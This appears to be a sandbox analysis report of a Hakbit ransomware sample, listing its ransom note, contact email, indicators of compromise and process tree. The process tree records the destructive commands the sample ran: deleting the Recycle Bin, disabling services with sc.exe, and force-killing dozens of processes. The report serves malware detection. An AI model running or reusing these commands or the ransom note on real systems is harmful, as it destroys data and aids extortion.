Overview
overview
10Static
static
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8Analysis
-
max time kernel
305s -
max time network
381s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 13:14
Static task
static1
Behavioral task
behavioral1
Sample
08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll
Resource
win10v20201028
Behavioral task
behavioral2
Sample
0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
1.bin/1.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
2b5e50bc3077610128051bc3e657c3f0e331fb8fed2559c6596911890ea866ba.dll
Resource
win10v20201028
Behavioral task
behavioral6
Sample
2c01b007729230c415420ad641ad92eb.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
42f972925508a82236e8533567487761.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
42f972925508a82236e8533567487761(1).exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
6a9e7107c97762eb1196a64baeadb291.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll
Resource
win10v20201028
Behavioral task
behavioral17
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral18
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral19
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral22
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
KLwC6vii.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral26
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral28
Sample
OnlineInstaller.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral30
Sample
SecuriteInfo.com.Gen.NN.ZexaF.34108.xy1@amqiedE.17985.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
SecuriteInfo.com.Generic.mg.cde56cf0169830ee.29869.dll
Resource
win10v20201028
General
-
Target
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
Family
hakbit
Ransom Note
To recover your data contact the email below
potentialenergy@mail.ru
Key Identifier:
oXDGKQK45IR5DjQ7fqtBGO8nBjmz9kOrbn2wtKMU/UeKZv0atyEJ6RZxPHpG9nbHu2NGCX+2HM74L5ypLubectZpjfoeR6qkCU1CSGblmAonaWgskRIjRylm2/JTFPh6I5qDpyNT9DceakbVn2BUfljaPrHoyNKTGcMsFqEqi/y5NB3i7211ksgJi3K9u5LCvsIcWqW8PvgNy0Ah+QPo/PMDGEESCWxlwApisTVcPjUd2UOTR0DhvT54wCET5inxnbxTSBTuZfUjIi2Y6jbKkL/hRiK4nApLH8T+oTy5gFZaVbU8UNnoGY8weQZmLQrxO4YPYiRUkB/v9Hy2gAEf9Xa5bxLeH56XuoGBZgPtrnC0L4yTemHofZwwCK5SipB0NPEnv6mU07cKQtlBlUy1Y04eEsvK6BPnaz+J3whD2KH7xOL51D/Q5TKhavcv4gPF/9dcTTBgC8j3IHHXLdWSoNmtd5+VCWKZF77+dDl2EHsKsdXFay40pmGqlbmMcwO3qtxo4b3Yg3doocsv6h+rfm/QgG7ciNuVZpo1ybx58FTWH9XgaHAwqH+CEaverTzy7/G2QNIqY8qrhzyUagDT7oLf5k4fe1p1rU9CM6oVhjV+EiMtE4HecN5UmVsps9jBD1XRfYaGe7MD3BUQ6Wu5hbanfu8fXcx08sVyHeUBOW0=
Number of files that were processed is: 1231
Emails
potentialenergy@mail.ru
Signatures
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\EnterApprove.tiff 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe -
Drops startup file 1 IoCs
Processes:
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 47 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 724 taskkill.exe 2040 taskkill.exe 3800 taskkill.exe 1676 taskkill.exe 4736 taskkill.exe 3192 taskkill.exe 616 taskkill.exe 4200 taskkill.exe 4348 taskkill.exe 980 taskkill.exe 4552 taskkill.exe 4152 taskkill.exe 4292 taskkill.exe 4468 taskkill.exe 2784 taskkill.exe 1804 taskkill.exe 2004 taskkill.exe 1392 taskkill.exe 2788 taskkill.exe 4308 taskkill.exe 3860 taskkill.exe 1104 taskkill.exe 200 taskkill.exe 4456 taskkill.exe 2792 taskkill.exe 3220 taskkill.exe 4624 taskkill.exe 3644 taskkill.exe 4460 taskkill.exe 3816 taskkill.exe 4680 taskkill.exe 3948 taskkill.exe 652 taskkill.exe 1608 taskkill.exe 1092 taskkill.exe 2268 taskkill.exe 5040 taskkill.exe 4220 taskkill.exe 420 taskkill.exe 4196 taskkill.exe 2456 taskkill.exe 5112 taskkill.exe 4204 taskkill.exe 2960 taskkill.exe 4752 taskkill.exe 3712 taskkill.exe 3624 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 4528 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exepid process 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe Token: SeDebugPrivilege 420 taskkill.exe Token: SeDebugPrivilege 724 taskkill.exe Token: SeDebugPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 3220 taskkill.exe Token: SeDebugPrivilege 4308 taskkill.exe Token: SeDebugPrivilege 3860 taskkill.exe Token: SeDebugPrivilege 4200 taskkill.exe Token: SeDebugPrivilege 4196 taskkill.exe Token: SeDebugPrivilege 4348 taskkill.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 980 taskkill.exe Token: SeDebugPrivilege 1104 taskkill.exe Token: SeDebugPrivilege 1804 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 2268 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 2004 taskkill.exe Token: SeDebugPrivilege 4624 taskkill.exe Token: SeDebugPrivilege 3644 taskkill.exe Token: SeDebugPrivilege 4736 taskkill.exe Token: SeDebugPrivilege 4752 taskkill.exe Token: SeDebugPrivilege 200 taskkill.exe Token: SeDebugPrivilege 3816 taskkill.exe Token: SeDebugPrivilege 4680 taskkill.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 5112 taskkill.exe Token: SeDebugPrivilege 3948 taskkill.exe Token: SeDebugPrivilege 3712 taskkill.exe Token: SeDebugPrivilege 4152 taskkill.exe Token: SeDebugPrivilege 3624 taskkill.exe Token: SeDebugPrivilege 3192 taskkill.exe Token: SeDebugPrivilege 4204 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe Token: SeDebugPrivilege 3800 taskkill.exe Token: SeDebugPrivilege 4456 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 4292 taskkill.exe Token: SeDebugPrivilege 4468 taskkill.exe Token: SeDebugPrivilege 4220 taskkill.exe Token: SeDebugPrivilege 2784 taskkill.exe Token: SeDebugPrivilege 5040 taskkill.exe Token: SeDebugPrivilege 3544 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exenotepad.exepid process 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe 4528 notepad.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exepid process 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exedescription pid process target process PID 4764 wrote to memory of 5104 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 5104 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 3008 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe cmd.exe PID 4764 wrote to memory of 3008 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe cmd.exe PID 4764 wrote to memory of 972 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 972 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 988 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 988 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 3544 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 3544 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe sc.exe PID 4764 wrote to memory of 420 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 420 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2792 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2792 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 724 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 724 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4308 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4308 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3220 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3220 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3860 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3860 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4200 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4200 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4196 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4196 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4348 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4348 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 652 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 652 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 980 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 980 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1104 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1104 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1608 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1608 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1804 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1804 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1092 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 1092 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2268 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2268 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2456 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2456 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2960 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2960 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4460 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4460 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2004 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 2004 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4552 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4552 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4624 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4624 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3644 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3644 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4752 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4752 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4736 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 4736 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 200 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 200 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3816 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe PID 4764 wrote to memory of 3816 4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exePID:4764"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"Modifies extensions of user filesDrops startup fileSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of FindShellTrayWindowSuspicious use of SendNotifyMessageSuspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\sc.exePID:5104"sc.exe" config SQLTELEMETRY start= disabled
-
C:\Windows\SYSTEM32\cmd.exePID:3008"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
-
C:\Windows\SYSTEM32\sc.exePID:972"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
-
C:\Windows\SYSTEM32\sc.exePID:988"sc.exe" config SQLWriter start= disabled
-
C:\Windows\SYSTEM32\sc.exePID:3544"sc.exe" config SstpSvc start= disabled
-
C:\Windows\SYSTEM32\taskkill.exePID:420"taskkill.exe" /IM mspub.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2792"taskkill.exe" /IM mydesktopqos.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:724"taskkill.exe" /IM mydesktopservice.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
